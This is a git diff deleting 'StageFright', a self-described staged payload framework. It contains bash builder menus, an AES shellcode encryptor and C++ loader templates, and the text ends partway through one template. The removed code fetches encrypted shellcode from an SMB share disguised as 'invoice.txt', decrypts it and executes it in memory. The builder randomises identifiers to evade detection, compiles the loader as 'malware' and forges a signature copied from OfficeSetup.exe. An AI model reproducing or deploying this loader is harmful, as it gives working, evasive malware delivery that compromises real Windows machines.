Delete StageFright/StageFright directory

StageFright/StageFright/DLL.sh

@@ -1,76 +0,0 @@
-#!/bin/bash
-
-NO_COLOR="\e[0m"
-WHITE="\e[0;17m"
-BOLD_WHITE="\e[1;37m"
-BLACK="\e[0;30m"
-BLUE="\e[0;34m"
-BOLD_BLUE="\e[1;34m"
-GREEN="\e[0;32m"
-BOLD_GREEN="\e[1;32m"
-CYAN="\e[0;36m"
-BOLD_CYAN="\e[1;36m"
-RED="\e[0;31m"
-BOLD_RED="\e[1;31m"
-PURPLE="\e[0;35m"
-BOLD_PURPLE="\e[1;35m"
-BROWN="\e[0;33m"
-BOLD_YELLOW="\e[1;33m"
-GRAY="\e[0;37m"
-BOLD_GRAY="\e[1;30m"
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-
-function easyexit()
-{
-	clear
-	exit
-}
-
-function title() {
-echo -e "$BOLD_GREEN
-
- _____ _                    ______    _       _     _   
-/  ___|| |                  |  ___|  (_)     | |   | |  
-\  --\_| |_ __ _  __   ___  | |_ ____ _  ____| |_  | |_ 
- --\  |  __/ _ |/ _  |/ _ \ |  _|  __| |/ _  |  _ \| __|
-/\__/ / || (_| | (_| |  __/ | | | |  | | (_| | | | | |_ 
-\____/ \__\__,_|\__, |\___| \_| |_|  |_|\__, |_| |_|\__|
-                 __/ |                   __/ |          
-                |___/                   |___/           
-
-          **by assume-breach**
-
-       A staged payload framework. "
-}
-
-title
-echo -e $BOLD_CYAN
-echo "Choose an option:"
-echo ""
-echo -e "$BOLD_BLUE 1.$BOLD_WHITE SMB Stager DLL"
-echo -e "$BOLD_BLUE 2.$BOLD_WHITE TCP Stager DLL"
-echo ""
-echo -n -e "$BOLD_WHITE > "
-read CHOICE
-clear
-
-if [ $CHOICE == 1 ]; then
-	echo ""
-	bash StageFright/SMBDLL/SMBDLL.sh
-
-elif [ $CHOICE == 2 ]; then
-	echo ""
-	bash StageFright/TCPDLL/TCPDLL.sh
-
-else 
-	echo -e $BOLD_RED Invalid option
-	sleep 3
-	trap easyexit EXIT
-fi

StageFright/StageFright/EXE.sh

@@ -1,76 +0,0 @@
-#!/bin/bash
-
-NO_COLOR="\e[0m"
-WHITE="\e[0;17m"
-BOLD_WHITE="\e[1;37m"
-BLACK="\e[0;30m"
-BLUE="\e[0;34m"
-BOLD_BLUE="\e[1;34m"
-GREEN="\e[0;32m"
-BOLD_GREEN="\e[1;32m"
-CYAN="\e[0;36m"
-BOLD_CYAN="\e[1;36m"
-RED="\e[0;31m"
-BOLD_RED="\e[1;31m"
-PURPLE="\e[0;35m"
-BOLD_PURPLE="\e[1;35m"
-BROWN="\e[0;33m"
-BOLD_YELLOW="\e[1;33m"
-GRAY="\e[0;37m"
-BOLD_GRAY="\e[1;30m"
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-
-function easyexit()
-{
-	clear
-	exit
-}
-
-function title() {
-echo -e "$BOLD_GREEN
-
- _____ _                    ______    _       _     _   
-/  ___|| |                  |  ___|  (_)     | |   | |  
-\  --\_| |_ __ _  __   ___  | |_ ____ _  ____| |_  | |_ 
- --\  |  __/ _ |/ _  |/ _ \ |  _|  __| |/ _  |  _ \| __|
-/\__/ / || (_| | (_| |  __/ | | | |  | | (_| | | | | |_ 
-\____/ \__\__,_|\__, |\___| \_| |_|  |_|\__, |_| |_|\__|
-                 __/ |                   __/ |          
-                |___/                   |___/           
-
-          **by assume-breach**
-
-       A staged payload framework. "
-}
-
-title
-echo -e $BOLD_CYAN
-echo "Choose an option:"
-echo ""
-echo -e "$BOLD_BLUE 1.$BOLD_WHITE AES Encrypted SMB Stager"
-echo -e "$BOLD_BLUE 2.$BOLD_WHITE AES Encrypted TCP Stager"
-echo ""
-echo -n -e "$BOLD_WHITE > "
-read CHOICE
-clear
-
-if [ $CHOICE == 1 ]; then
-	echo ""
-	bash StageFright/SMB/SMB.sh
-
-elif [ $CHOICE == 2 ]; then
-	echo ""
-	bash StageFright/TCP/TCP.sh
-
-else 
-	echo -e $BOLD_RED Invalid option
-	sleep 3
-	trap easyexit EXIT
-fi

StageFright/StageFright/StageFright.sh

@@ -1,76 +0,0 @@
-#!/bin/bash
-
-NO_COLOR="\e[0m"
-WHITE="\e[0;17m"
-BOLD_WHITE="\e[1;37m"
-BLACK="\e[0;30m"
-BLUE="\e[0;34m"
-BOLD_BLUE="\e[1;34m"
-GREEN="\e[0;32m"
-BOLD_GREEN="\e[1;32m"
-CYAN="\e[0;36m"
-BOLD_CYAN="\e[1;36m"
-RED="\e[0;31m"
-BOLD_RED="\e[1;31m"
-PURPLE="\e[0;35m"
-BOLD_PURPLE="\e[1;35m"
-BROWN="\e[0;33m"
-BOLD_YELLOW="\e[1;33m"
-GRAY="\e[0;37m"
-BOLD_GRAY="\e[1;30m"
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-
-function easyexit()
-{
-	clear
-	exit
-}
-
-function title() {
-echo -e "$BOLD_GREEN
-
- _____ _                    ______    _       _     _   
-/  ___|| |                  |  ___|  (_)     | |   | |  
-\  --\_| |_ __ _  __   ___  | |_ ____ _  ____| |_  | |_ 
- --\  |  __/ _ |/ _  |/ _ \ |  _|  __| |/ _  |  _ \| __|
-/\__/ / || (_| | (_| |  __/ | | | |  | | (_| | | | | |_ 
-\____/ \__\__,_|\__, |\___| \_| |_|  |_|\__, |_| |_|\__|
-                 __/ |                   __/ |          
-                |___/                   |___/           
-
-                **by assume-breach**
-
-             A staged payload framework." 
-}
-
-title
-echo -e $BOLD_CYAN
-echo "Choose an option:"
-echo ""
-echo -e "$BOLD_BLUE 1.$BOLD_WHITE Create Staged EXE"
-echo -e "$BOLD_BLUE 2.$BOLD_WHITE Create Staged DLL"
-echo ""
-echo -n -e "$BOLD_WHITE > "
-read CHOICE
-clear
-
-if [ $CHOICE == 1 ]; then
-	echo ""
-	bash EXE.sh
-
-elif [ $CHOICE == 2 ]; then
-	echo ""
-	bash DLL.sh
-
-else
-	echo -e $BOLD_RED Invalid option
-	sleep 3
-	trap easyexit EXIT
-fi

StageFright/StageFright/StageFright/Resources/aesencrypt.py

@@ -1,26 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with AES
-# 
-# author: reenz0h (twitter: @SEKTOR7net)
-
-import sys
-from base64 import b64encode
-from Crypto.Cipher import AES
-from Crypto.Util.Padding import pad
-from Crypto.Random import get_random_bytes
-import hashlib
-
-KEY = get_random_bytes(16)
-iv = 16 * b'\x00'
-cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
-
-try:
-    plaintext = open(sys.argv[1], "rb").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
-
-print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
-print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

StageFright/StageFright/StageFright/SMB/Resources/aesencrypt.py

@@ -1,26 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with AES
-# 
-# author: reenz0h (twitter: @SEKTOR7net)
-
-import sys
-from base64 import b64encode
-from Crypto.Cipher import AES
-from Crypto.Util.Padding import pad
-from Crypto.Random import get_random_bytes
-import hashlib
-
-KEY = get_random_bytes(16)
-iv = 16 * b'\x00'
-cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
-
-try:
-    plaintext = open(sys.argv[1], "rb").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
-
-print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
-print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

StageFright/StageFright/StageFright/SMB/Resources/template.cpp

@@ -1,252 +0,0 @@
-#include <windows.h>
-#include <winternl.h>
-#include <wchar.h>
-#include <winternl.h>
-#include <winbase.h>
-#include <winnt.h>
-#include <fileapi.h>
-#include <stdio.h>
-#include <stdint.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#include <psapi.h>
-#include <tlhelp32.h>
-
-#pragma comment(lib, "crypt32.lib")
-#pragma comment(lib, "advapi32.lib")
-
-#ifndef NTSTATUS
-typedef LONG NTSTATUS;
-#endif
-
-#ifndef NT_SUCCESS
-#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
-#endif
-
-typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    ULONG_PTR ZeroBits,
-    PSIZE_T RegionSize,
-    ULONG AllocationType,
-    ULONG Protect);
-
-typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    PSIZE_T RegionSize,
-    ULONG FreeType);
-
-typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    PSIZE_T RegionSize,
-    ULONG NewProtect,
-    PULONG OldProtect);
-
-typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
-    OUT PHANDLE ThreadHandle,
-    IN ACCESS_MASK DesiredAccess,
-    IN LPVOID ObjectAttributes,
-    IN HANDLE ProcessHandle,
-    IN LPTHREAD_START_ROUTINE StartAddress,
-    IN LPVOID Parameter,
-    IN BOOL CreateSuspended,
-    IN ULONG StackZeroBits,
-    IN ULONG SizeOfStackCommit,
-    IN ULONG SizeOfStackReserve,
-    OUT LPVOID BytesBuffer);
-
-typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
-    HANDLE ObjectHandle,
-    BOOLEAN Alertable,
-    PLARGE_INTEGER Timeout);
-
-typedef NTSTATUS(WINAPI* _NtClose)(
-    HANDLE Handle);
-
-DWORD WINAPI ThreadFunction(LPVOID lpParameter);
-
-void PrintError(const wchar_t* action) {}
-
-BOOL oChGWKarQjmd(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
-    BOOL operationSuccess = TRUE;
-    PBYTE allocatedMemory = NULL;
-
-    WCHAR szFullUNCPath[MAX_PATH];
-    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
-
-    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-    if (hFile == INVALID_HANDLE_VALUE) {
-        operationSuccess = FALSE;
-    }
-    else {
-        DWORD fileSize = GetFileSize(hFile, NULL);
-        if (fileSize == INVALID_FILE_SIZE) {
-            operationSuccess = FALSE;
-        }
-        else {
-            SIZE_T allocationSize = fileSize;
-
-            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
-            NTSTATUS status = pNtAllocateVirtualMemory(
-                GetCurrentProcess(),
-                (PVOID*)&allocatedMemory,
-                0,
-                &allocationSize,
-                MEM_COMMIT | MEM_RESERVE,
-                PAGE_READWRITE);
-
-            if (!NT_SUCCESS(status)) {
-                operationSuccess = FALSE;
-            }
-            else {
-                DWORD bytesRead;
-                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
-                    operationSuccess = FALSE;
-                }
-
-                *binaryData = allocatedMemory;
-                *binarySize = bytesRead;
-            }
-        }
-
-        CloseHandle(hFile);
-    }
-
-    return operationSuccess;
-}
-
-BOOL VIJanVqcg(const PBYTE BinaryData, SIZE_T DataSize) {
-    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-    if (pMemory == NULL) {
-        return FALSE;
-    }
-
-    memcpy(pMemory, BinaryData, DataSize);
-
-    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
-    SIZE_T regionSize = DataSize;
-    ULONG oldProtect;
-    NTSTATUS status = pNtProtectVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        PAGE_NOACCESS,
-        &oldProtect);
-
-    if (!NT_SUCCESS(status)) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    status = pNtProtectVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        PAGE_EXECUTE_READ,
-        &oldProtect);
-
-    if (!NT_SUCCESS(status)) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
-    if (hThread == NULL) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    ULONG suspendCount = ResumeThread(hThread);
-    if (suspendCount == (DWORD)-1) {
-        CloseHandle(hThread);
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    WaitForSingleObject(hThread, INFINITE);
-
-    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
-    status = pNtClose(hThread);
-
-    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
-    status = pNtFreeVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        MEM_RELEASE);
-
-    return TRUE;
-}
-
-DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
-    PBYTE BinaryData = (PBYTE)lpParameter;
-    typedef void (*FunctionPointer)();
-    FunctionPointer pFunction = (FunctionPointer)BinaryData;
-
-    pFunction();
-
-    return 0;
-}
-
-int deTOQBVTuK(char* Random4, unsigned int LrJUg, char* ycwrsVM, size_t ycwrsVMlen) {
-    HCRYPTPROV hProv;
-    HCRYPTHASH hHash;
-    HCRYPTKEY hKey;
-
-    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
-        return -1;
-    }
-    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
-        return -1;
-    }
-    if (!CryptHashData(hHash, (BYTE*)ycwrsVM, (DWORD)ycwrsVMlen, 0)) {
-        return -1;
-    }
-    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
-        return -1;
-    }
-
-    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &LrJUg)) {
-        return -1;
-    }
-
-    CryptReleaseContext(hProv, 0);
-    CryptDestroyHash(hHash);
-    CryptDestroyKey(hKey);
-
-    return 0;
-}
-
-char nzjimSxfJSWR[] =  { 0x73, 0x29, 0x6a, 0x97, 0xdb, 0x93, 0xc6, 0x4d, 0x6a, 0x5f, 0x6c, 0x42, 0xe2, 0xf2, 0xf9, 0x7a };
-
-int main() {
-    LPCWSTR szServer = L"Win11Blue";
-    LPCWSTR szFilePath = L"Shared\\invoice.txt";
-
-    PBYTE GHqjoSGLKLzfx;
-    SIZE_T GHqjoSGLKLzfxSize;
-
-    BOOL success = oChGWKarQjmd(szServer, szFilePath, &GHqjoSGLKLzfx, &GHqjoSGLKLzfxSize);
-
-    if (success) {
-        deTOQBVTuK((char*)GHqjoSGLKLzfx, GHqjoSGLKLzfxSize, nzjimSxfJSWR, sizeof(nzjimSxfJSWR));
-
-        success = VIJanVqcg(GHqjoSGLKLzfx, GHqjoSGLKLzfxSize);
-
-        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
-        SIZE_T regionSize = GHqjoSGLKLzfxSize;
-        NTSTATUS status = pNtFreeVirtualMemory(
-            GetCurrentProcess(),
-            (PVOID*)&GHqjoSGLKLzfx,
-            &regionSize,
-            MEM_RELEASE);
-
-        LocalFree(GHqjoSGLKLzfx);
-    }
-
-    return success ? 0 : 1;
-}
-

StageFright/StageFright/StageFright/SMB/SMB.sh

@@ -1,190 +0,0 @@
-#!/bin/bash
-
-# Color variables
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-cat << "EOF"
-
-  ___   _____ _____   _____                            _           _ 
- / _ \ |  ___/  ___| |  ___|                          | |         | |
-/ /_\ \| |__ \ `--.  | |__ _ __   ___ _ __ _   _ _ __ | |_ ___  __| |
-|  _  ||  __| `--. \ |  __| '_ \ / __| '__| | | | '_ \| __/ _ \/ _` |
-| | | || |___/\__/ / | |__| | | | (__| |  | |_| | |_) | ||  __/ (_| |
-\_| |_/\____/\____/  \____/_| |_|\___|_|   \__, | .__/ \__\___|\__,_|
-                                            __/ | |                  
-                                           |___/|_|                  
- _____ _                       _   ________  _________               
-/  ___| |                     | | /  ___|  \/  || ___ \              
-\ `--.| |_ __ _  __ _  ___  __| | \ `--.| .  . || |_/ /              
- `--. \ __/ _` |/ _` |/ _ \/ _` |  `--. \ |\/| || ___ \              
-/\__/ / || (_| | (_| |  __/ (_| | /\__/ / |  | || |_/ /              
-\____/ \__\__,_|\__, |\___|\__,_| \____/\_|  |_/\____/               
-                 __/ |                                               
-                |___/                                                
- _____                    _   _                                      
-|  ___|                  | | (_)                                     
-| |____  _____  ___ _   _| |_ _  ___  _ __                           
-|  __\ \/ / _ \/ __| | | | __| |/ _ \| '_ \                          
-| |___>  <  __/ (__| |_| | |_| | (_) | | | |                         
-\____/_/\_\___|\___|\__,_|\__|_|\___/|_| |_|                                             
-
-EOF
-
-echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
-echo ""
-read Shellcode
-echo ""
-echo -e ${green}"What's The Hostname Of Your Target? ex: Win11Wkstn"${clear}
-echo ""
-read HOSTNAME
-echo ""
-echo -e ${green}"Enter The Share Name You're Hosting Your Shellcode From'. ex: CorporateShare"${clear}
-echo ""
-read SHAREFOLDER
-echo ""
-echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
-echo ""
-read SHELLCODEFILE
-echo ""
-echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
-echo ""
-read MALWARE
-echo ""
-cp StageFright/SMB/template.cpp StageFright/SMB/Resources/template.cpp
-echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
-echo ""
-sleep 2
-python3 StageFright/SMB/Resources/aesencrypt.py $Shellcode > shell.txt
-echo -e ${yellow}"***Encryption Completed***"${clear}
-echo ""
-cp shell.txt shell2.txt
-
-#Generate AES Key
-keys=$(cat "shell2.txt")
-cut -d 'p' -f1 shell2.txt > shell3.txt
-keys=$(cat shell3.txt)
-keysnow=${keys#*=}
-sed -i "s/KEYVALUE/$keysnow/g" StageFright/SMB/Resources/template.cpp
-
-#Generate AES Payload
-payload=$(cat "shell.txt")
-payloadnow=${payload#*;}
-payloadtoday=${payloadnow#*=}
-echo $payloadtoday > shell5.txt
-cp StageFright/SMB/conv.py StageFright/SMB/Resources/con.py
-perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/SMB/Resources/con.py
-sed -i "s/{/[/g" -i StageFright/SMB/Resources/con.py
-sed -i "s/}/]/g" -i StageFright/SMB/Resources/con.py
-sed -i "s/;//g" -i StageFright/SMB/Resources/con.py
-python3 StageFright/SMB/Resources/con.py
-#rm StageFright/SMB/Resources/con.py
-mv payload.bin $SHELLCODEFILE
-sleep 2
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomE=$(cat shell.txt)
-sed -i "s/RandomE/$RandomE/g" StageFright/SMB/Resources/template.cpp
-
-
-#Replace IP, PORT and SHELLCODEFILE
-sed -i "s/SHAREFOLDER/$SHAREFOLDER/g" StageFright/SMB/Resources/template.cpp
-sed -i "s/HOSTNAME/$HOSTNAME/g" StageFright/SMB/Resources/template.cpp
-sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/SMB/Resources/template.cpp
-#Replacing Values
-
-# Get Payload From URL Function
-
-#FindShare
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-Random1=$(cat shell.txt)
-sed -i "s/Random1/$Random1/g" StageFright/SMB/Resources/template.cpp
-
-#pPayloadBytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-Random2=$(cat shell.txt)
-sed -i "s/Random2/$Random2/g" StageFright/SMB/Resources/template.cpp
-
-#sPayloadSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random3=$(cat shell.txt)
-sed -i "s/Random3/$Random3/g" StageFright/SMB/Resources/template.cpp
-
-#bSTATE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
-Random5=$(cat shell.txt)
-sed -i "s/Random5/$Random5/g" StageFright/SMB/Resources/template.cpp
-
-#sSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
-Random6=$(cat shell.txt)
-sed -i "s/Random6/$Random6/g" StageFright/SMB/Resources/template.cpp
-
-#hInternet
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-Random7=$(cat shell.txt)
-sed -i "s/Random7/$Random7/g" StageFright/SMB/Resources/template.cpp
-
-#dwBytesRead
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
-Random8=$(cat shell.txt)
-sed -i "s/Random8/$Random8/g" StageFright/SMB/Resources/template.cpp
-
-#pBytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random9=$(cat shell.txt)
-sed -i "s/Random9/$Random9/g" StageFright/SMB/Resources/template.cpp
-
-#PAYLOAD
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomA=$(cat shell.txt)
-sed -i "s/RandomA/$RandomA/g" StageFright/SMB/Resources/template.cpp
-
-#Sleep Function
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-RandomJ=$(cat shell.txt)
-sed -i "s/RandomJ/$RandomJ/g" StageFright/SMB/Resources/template.cpp
-
-#AES KEY NAME
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-RandomK=$(cat shell.txt)
-sed -i "s/RandomK/$RandomK/g" StageFright/SMB/Resources/template.cpp
-
-# Main Function
-
-#Bytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-RandomB=$(cat shell.txt)
-sed -i "s/RandomB/$RandomB/g" StageFright/SMB/Resources/template.cpp
-
-#Size
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomC=$(cat shell.txt)
-sed -i "s/RandomC/$RandomC/g" StageFright/SMB/Resources/template.cpp
-
-#Compile
-
-echo -e ${yellow}"+++Compiling Malware+++"${clear}
-x86_64-w64-mingw32-g++ -o $MALWARE StageFright/SMB/Resources/template.cpp -Wno-narrowing -fpermissive -lws2_32 -lntdll -O2 >/dev/null 2>&1
-echo ""
-sleep 2
-rm shell*
-echo -e ${yellow}"***Malware Compiled***"${clear}
-echo ""
-sleep 2
-echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
-echo ""
-sleep 2
-python3 python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
-mv signed$MALWARE $MALWARE
-echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
-echo ""
-
-
-

StageFright/StageFright/StageFright/SMB/conv.py

@@ -1,4 +0,0 @@
-buf=PAYVAL 
-payload = bytes(bytearray(buf))
-with open('payload.bin', 'wb') as f:
-    f.write(payload)

StageFright/StageFright/StageFright/SMB/template.cpp

@@ -1,252 +0,0 @@
-#include <windows.h>
-#include <winternl.h>
-#include <wchar.h>
-#include <winternl.h>
-#include <winbase.h>
-#include <winnt.h>
-#include <fileapi.h>
-#include <stdio.h>
-#include <stdint.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#include <psapi.h>
-#include <tlhelp32.h>
-
-#pragma comment(lib, "crypt32.lib")
-#pragma comment(lib, "advapi32.lib")
-
-#ifndef NTSTATUS
-typedef LONG NTSTATUS;
-#endif
-
-#ifndef NT_SUCCESS
-#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
-#endif
-
-typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    ULONG_PTR ZeroBits,
-    PSIZE_T RegionSize,
-    ULONG AllocationType,
-    ULONG Protect);
-
-typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    PSIZE_T RegionSize,
-    ULONG FreeType);
-
-typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    PSIZE_T RegionSize,
-    ULONG NewProtect,
-    PULONG OldProtect);
-
-typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
-    OUT PHANDLE ThreadHandle,
-    IN ACCESS_MASK DesiredAccess,
-    IN LPVOID ObjectAttributes,
-    IN HANDLE ProcessHandle,
-    IN LPTHREAD_START_ROUTINE StartAddress,
-    IN LPVOID Parameter,
-    IN BOOL CreateSuspended,
-    IN ULONG StackZeroBits,
-    IN ULONG SizeOfStackCommit,
-    IN ULONG SizeOfStackReserve,
-    OUT LPVOID BytesBuffer);
-
-typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
-    HANDLE ObjectHandle,
-    BOOLEAN Alertable,
-    PLARGE_INTEGER Timeout);
-
-typedef NTSTATUS(WINAPI* _NtClose)(
-    HANDLE Handle);
-
-DWORD WINAPI ThreadFunction(LPVOID lpParameter);
-
-void PrintError(const wchar_t* action) {}
-
-BOOL Random1(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
-    BOOL operationSuccess = TRUE;
-    PBYTE allocatedMemory = NULL;
-
-    WCHAR szFullUNCPath[MAX_PATH];
-    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
-
-    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-    if (hFile == INVALID_HANDLE_VALUE) {
-        operationSuccess = FALSE;
-    }
-    else {
-        DWORD fileSize = GetFileSize(hFile, NULL);
-        if (fileSize == INVALID_FILE_SIZE) {
-            operationSuccess = FALSE;
-        }
-        else {
-            SIZE_T allocationSize = fileSize;
-
-            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
-            NTSTATUS status = pNtAllocateVirtualMemory(
-                GetCurrentProcess(),
-                (PVOID*)&allocatedMemory,
-                0,
-                &allocationSize,
-                MEM_COMMIT | MEM_RESERVE,
-                PAGE_READWRITE);
-
-            if (!NT_SUCCESS(status)) {
-                operationSuccess = FALSE;
-            }
-            else {
-                DWORD bytesRead;
-                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
-                    operationSuccess = FALSE;
-                }
-
-                *binaryData = allocatedMemory;
-                *binarySize = bytesRead;
-            }
-        }
-
-        CloseHandle(hFile);
-    }
-
-    return operationSuccess;
-}
-
-BOOL Random2(const PBYTE BinaryData, SIZE_T DataSize) {
-    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-    if (pMemory == NULL) {
-        return FALSE;
-    }
-
-    memcpy(pMemory, BinaryData, DataSize);
-
-    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
-    SIZE_T regionSize = DataSize;
-    ULONG oldProtect;
-    NTSTATUS status = pNtProtectVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        PAGE_NOACCESS,
-        &oldProtect);
-
-    if (!NT_SUCCESS(status)) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    status = pNtProtectVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        PAGE_EXECUTE_READ,
-        &oldProtect);
-
-    if (!NT_SUCCESS(status)) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
